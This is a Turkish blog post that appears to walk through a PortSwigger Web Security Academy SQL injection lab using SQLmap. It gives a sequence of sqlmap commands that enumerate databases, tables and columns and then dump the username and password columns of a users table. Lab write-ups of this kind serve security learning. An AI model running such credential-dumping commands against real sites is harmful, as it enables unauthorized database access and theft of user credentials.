BOOK THIS SPACE FOR AD
ARTICLE ADSQLmap, web uygulamalarındaki SQL Injection güvenlik açıklarını tespit edip bunlardan yararlanmanıza yardımcı olan güçlü bir açık kaynaklı sızma testi aracıdır.
SQL Injection, bir saldırganın web sitesindeki kullanıcı giriş alanları aracılığıyla veritabanına gönderilen SQL sorgularını değiştirebildiği yaygın bir saldırı tekniğidir. Bu güvenlik açığını kullanarak saldırganlar, veritabanına yetkisiz erişim sağlayabilir, hassas bilgileri çalabilir, verileri değiştirebilir ve hatta rastgele komutlar çalıştırabilirler.
SQLmap, bu süreci otomatikleştirerek güvenlik uzmanlarının ve sızma testi uzmanlarının işini kolaylaştırır. MySQL, Oracle, PostgreSQL, Microsoft SQL Server ve daha birçok veritabanı yönetim sistemini destekler.
SQLmap ile web uygulamalarınızın güvenliğini nasıl değerlendirebileceğinizi öğrenmek için hazır mısınız? Hadi başlayalım!
Burada da aynı şekilde aynı yerde bir sql injection olduğunu söylüyor bu seferki Bu laboratuvarda amacınız, SQL enjeksiyonu zafiyetini kullanarak farklı bir tablodan veri elde etmektir.
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Giftsherhangi bir değişiklik yapmadan yine sqlmap e sorgumuzu atıyoruz ve bize bir sqlinjrviton olduğunu doğruluto burada
sıdaki macımız veri tabnlarını görüntelemke olcaktır
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Gifts --dbsveri tabanuımzı seçerek tablo isimşerini alalım şimd
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Gifts -D public --tablesşimdi tablomzuu secerek içerindeki kolon karı blirlemek
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Gifts -D public -T users --columnsşimdi yapmamız gereken tek şey kolonların iinini görüntelme ilk olarak username ile başlıyalım
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Gifts -D public -T users -C username --dumpşimdi passwrod kolonunu yığalım
sqlmap -u https://0a9700b8041b492b81fdac8a00fd009a.web-security-academy.net/filter?category=Gifts -D public -T users -C password --dump